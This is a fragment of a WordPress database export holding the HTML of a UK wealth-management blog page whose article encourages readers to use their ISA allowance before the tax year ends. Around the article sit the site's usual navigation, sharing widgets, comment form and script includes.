Last Minute<br/><span style=\"line-height: 1.5em;\">the longer your money is invested the longer it has to grow.</span></p>&#13;\n<p>#5 And Remember<br/><span style=\"line-height: 1.5em;\"> consistent saving in an ISA can see you accumulate a significant sum over the long term.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1>Make the Most of Your ISA Allowance<br/>&#13;\nBefore it’s T<span style=\"line-height: 1.5em;\">oo Late</span></h1>&#13;\n<p>Sheltering up to £11,520 tax-efficiently means taking action NOW</p>&#13;\n<p><span style=\"font-size: 1.5em; line-height: 1.5em;\"><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/></span></p>&#13;\n<p>As I’m writing this the end of the financial year is only 24 days away – but for practical purposes make that 23 days, given that April 5<sup>th</sup> this year falls on a Saturday.</p>&#13;\n<p>That means there’s not much time left to make the most of your Individual Savings Account for this year – and to make a good start on your tax-efficient savings for the following year.</p>&#13;\n<p>ISAs (as they’re popularly known) were introduced by Gordon Brown on 6<sup>th</sup> April 1999 – fifteen years ago if you want to feel old! They replaced PEPs and TESSAs, with the original annual limit on the amount you could invest being £7,000.</p>&#13;\n<p>The overall limit for the current year ending on April 5<sup>th</sup> is £11,520 and from April 6<sup>th</sup> will rise to £11,880. Up to half of this amount – £5,940 – can go into a cash ISA, with the balance going into a stock and shares ISA.</p>&#13;\n<p><a href=\"#\"/>The full £11,880 can obviously be invested in a stocks and shares ISA and it is also possible to ‘mix and match.’ For example, £3,000 into a cash ISA and the balance of £8,880 into a stocks and shares ISA.</p>&#13;\n<p>Financial advisers will always tell you that if you’re going to save you must maximise your tax free savings – make sure you use your ISA allowances before you do anything else. Why are they so insistent? It comes down to compound interest.</p>&#13;\n<p>Whether you’re saving through a cash ISA or investing in the stocks and shares equivalent it makes sense <i>not</i> to pay tax on your returns.</p>&#13;\n<p>Over a short period of time – say your first year – the difference between taxed and untaxed returns isn’t very significant. But over a longer period of time – ten years, for example – it most definitely is, because of the effect of compound interest.</p>&#13;\n<p>Save regularly and consistently, allow compound interest to work for you and over time the returns can be dramatic.</p>&#13;\n<p>There are now several people claiming to be *millionaires simply from investing in ISAs every year and making sure that they used their full allowance. Admittedly they have enjoyed particularly good growth rates to reach the ‘millionaire milestone’ in such a short space of time: but the million pound target is within reach of anyone saving consistently over a 30 year period, assuming only a modest rate of growth and cost-of-living increases in the ISA allowance.</p>&#13;\n<p>Remember too that any children not eligible for a Child Trust fund account <i>are </i>eligible for a Junior ISA. For 2017/14 that limit is £3,720 – which makes them a great place to start saving for a child’s further education or first house.</p>&#13;\n<p>So as the end of the tax year approaches – and remember, ISA allowances cannot be carried forward from one ta year to the next – what action should you take? Here is our five point guide:</p>&#13;\n<ul><li>&#13;\n<p>If you’re saving or investing in this tax year and you haven’t yet used all your ISA allowance, make sure you do that before any other savings or investments</p>&#13;\n</li>&#13;\n<li>&#13;\n<p>If you haven’t used any of your ISA allowances, then you’ve 23 days to use them otherwise they are irretrievably lost</p>&#13;\n</li>&#13;\n<li>&#13;\n<p>Don’t forget that ISAs can be transferred from one provider to another: for example, if you’re not happy with the return you’re receiving on your cash ISA it could well be improved by switching to a different provider</p>&#13;\n</li>&#13;\n<li>&#13;\n<p>Don’t wait until the last minute to use your 2017/2015 ISA allowance: the longer your money is invested the longer it has to grow</p>&#13;\n</li>&#13;\n<li>&#13;\n<p>And remember that regular, consistent saving in an ISA can see you accumulate a significant sum over the long term<span style=\"font-size: 14px; line-height: 1.5em;\"> </span></p>&#13;\n</li>&#13;\n</ul><p/>&#13;\n<p/>&#13;\n<p>As always if you have any questions or comment on the points made in this article then don’t hesitate to contact us here at Equity SMART. We’re only a phone call or an e-mail away!</p>&#13;\n<p><span style=\"line-height: 1.5em;\">Warmest regards</span></p>&#13;\n<p>Sam<br/>&#13;\nStrategic Development Director</p>&#13;\n<p>The value of investments can go down as well as up and you may not get back the amount invested. The value of tax savings in an ISA depends on individual circumstances. Information is based on our current understanding of taxation legislation and regulations. Any levels and bases of,and reliefs from taxation, are subject to change.</p>&#13;\n<p>* <a title=\"The Telegraph\" href=\"http://www.telegraph.co.uk/finance/personalfinance/investing/isas/10648500/The-30-year-path-to-Isa-millionaire\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://www.telegraph.co.uk\']);\">The Telegraph</a></p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>We manage your wealth in less time with less hassle</h2><p>You could improve your situation, starting today - Click the link</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category\" title=\"View all posts in Investments\" rel=\"category tag\">Investments</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../make-isa-allowance-late/\" title=\"Comment on Make the Most of Your ISA Allowance – Before it’s Too Late\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/make-isa-allowance-late/&amp;p[title]=Make%20the%20Most%20of%20Your%20ISA%20Allowance%20%E2%80%93%20Before%20it%E2%80%99s%20Too%20Late\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Make+the+Most+of+Your+ISA+Allowance+%E2%80%93+Before+it%E2%80%99s+Too+Late%20http://www.equalitywalk.org.uk/make-isa-allowance-late/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/make-isa-allowance-late/&amp;title=Make%20the%20Most%20of%20Your%20ISA%20Allowance%20%E2%80%93%20Before%20it%E2%80%99s%20Too%20Late\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/make-isa-allowance-late/&amp;title=Make%20the%20Most%20of%20Your%20ISA%20Allowance%20%E2%80%93%20Before%20it%E2%80%99s%20Too%20Late\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fmake-isa-allowance-late%2F&amp;name=Make+the+Most+of+Your+ISA+Allowance+%E2%80%93+Before+it%E2%80%99s+Too+Late&amp;description=Time+is+running+out+if+you+want+to+make+the+most+of+this+year%27s+ISA+allowance+before+5th+April%2C+so+you%27ll+need+to+get+your+skates+on+...\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/make-isa-allowance-late/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Make the Most of Your ISA Allowance – Before it’s Too Late&amp;body=http://www.equalitywalk.org.uk/make-isa-allowance-late/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../make-isa-allowance-late/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7771\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"451a465e93\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"248\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','&#13;\n	Make the Most of Your ISA Allowance – Before it’s Too Late','Time is running out if you want to make the most of this year’s ISA allowance. Sheltering up to £11,520 tax-efficiently means taking action NOW','publish','closed','closed','','make-the-most-of-your-isa-allowance-before-its-too-late','','','2017-09-21 16:34:34','2017-09-21 16:34:34','',0,'http://www.equalitywalk.org.uk/make-the-most-of-your-isa-allowance-before-its-too-late',0,'page','',0),(80,1,'2017-09-21 16:34:34','2017-09-21 16:34:34','<body class=\"single single-post postid-7683 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span 